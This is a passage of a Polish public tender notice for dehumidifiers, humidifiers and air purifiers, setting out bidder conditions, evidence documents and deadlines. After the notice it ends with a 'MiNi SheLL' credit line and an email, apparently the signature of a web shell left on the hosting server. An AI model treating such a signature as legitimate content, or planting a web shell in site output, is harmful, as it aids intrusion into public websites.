udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, określone w art. 112 ustawy Pzp w następującym zakresie:<br/>1.1.	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.3 sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/>1.4 zdolności technicznej lub zawodowej: <br/>1)	DLA CZĘŚĆ I ZAMÓWIENIA w zakresie doświadczenia warunek ten będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych), należycie zrealizował, co najmniej dwie (2) dostawy o łącznej wartości 200 000,00 zł brutto, z których każda polega na dostawie urządzeń do kontroli klimatu w pomieszczeniach budynku użyteczności publicznej (osuszaczy i/lub nawilżaczy powietrza) wraz z ich uruchomieniem. <br/>2)	DLA CZĘŚĆ II ZAMÓWIENIA w zakresie doświadczenia - warunek ten będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych), należycie zrealizował, co najmniej dwie (2) dostawy o łącznej wartości 50 000,00 zł brutto, z których każda polega na dostawie urządzeń do kontroli klimatu w pomieszczeniach budynku użyteczności publicznej (oczyszczaczy powietrza). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający przed wyborem najkorzystniejszej oferty złożonej dla CZĘŚCI I oraz dla CZĘŚCI II, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania na potwierdzenie braku podstaw do wykluczenia, następujących dokumentów:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający i potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (doświadczenia), przed wyborem oferty złożonej dla CZĘŚCI I i/lub CZĘŚCI II wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, następujących dokumentów:<br/>1)	wykazu wykonanych dostaw, a w przypadku świadczeń powtarzających się lub ciągłych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, przygotowanego dla Części I wg wzoru Załącznika nr 7.1 do SWZ., dla Części II wg wzoru Załącznika nr 7.2 do SWZ.<br/>2)	dowodów, określających czy te dostawy, wskazane przez Wykonawcę w ww. wykazach dla Części I oraz dla Części II, zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>UWAGA. W przypadku wykazania dostaw, realizowanych o umowę niezakończoną przed upływem terminu składania ofert w postępowaniu, Zamawiający uwzględni wartość tej ich części, która do upływu ww. terminu została faktycznie zrealizowana, a Wykonawca jest zobowiązany do wskazania wartości realizowanego zamówienia tj. wartości całej umowy oraz wartości dostaw już zrealizowanych w ramach umowy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Przedmiotowe środki dowodowe, Wykonawca składa wraz z ofertą.<br/>2.	Przedmiotowe środki dowodowe, które zobligowane jest złożyć Wykonawca obejmują informację o parametrach technicznych każdego rodzaju oferowanego urządzenia: osuszaczy, nawilżaczy powietrza dla CZĘŚCI I ZAMÓWIENIA i oczyszczaczy dla CZĘŚĆ II ZAMÓWIENIA, sporządzoną przez Wykonawcę wg wzoru stanowiącego odpowiednio Załącznik nr 6.1 oraz Załącznik nr 6.2 do SWZ, z której będzie wynikało, że oferowany produkt odpowiada wymaganiom technicznym i funkcjonalnym, określonym przez Zamawiającego w załączniku nr 1.1 (Część I) oraz załączniku 1.2 (Część II) do SWZ – Szczegółowym opisie przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. CZĘŚĆ I. Informacja o parametrach technicznych każdego rodzaju oferowanego urządzenia: osuszaczy, nawilżaczy powietrza sporządzoną wg wzoru stanowiącego Załącznik nr 6.1 do SWZ przez Wykonawcę, z której będzie wynikało, że oferowany produkt odpowiada wymaganiom technicznym i funkcjonalnym, określonym przez Zamawiającego w załączniku nr 1.1 do SWZ – Szczegółowym opisie przedmiotu zamówienia.<br/>2. CZĘŚĆ II. Informacja o parametrach technicznych każdego rodzaju oferowanego urządzenia: oczyszczaczy powietrza sporządzoną wg wzoru stanowiącego Załącznik nr 6.2 do SWZ przez Wykonawcę, z której będzie wynikało, że oferowany produkt odpowiada wymaganiom technicznym i funkcjonalnym, określonym przez Zamawiającego w załączniku nr 1.2 do SWZ – Szczegółowym opisie przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy, zgodnie z art. 58 ust. 2 Ustawy Pzp, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2.	Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>2.1.	Postępowania o zamówienie publiczne, którego dotyczy,<br/>2.2.	Wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>2.3.	Ustanowionego pełnomocnika i zakresu jego umocowania.<br/>3.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają wraz z ofertą Pełnomocnictwo. <br/>5.	Zapisy SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy PZP oraz projektowanych postanowieniach umowy (Załączniku nr 2.1 / Część I/ oraz Załączniku nr. 2.2 /Część II/ do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w formie elektronicznej wraz z wymaganymi dokumentami należy zamieścić na Platformie https://mnwr.ezamawiajacy.pl w części dotyczącej niniejszego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com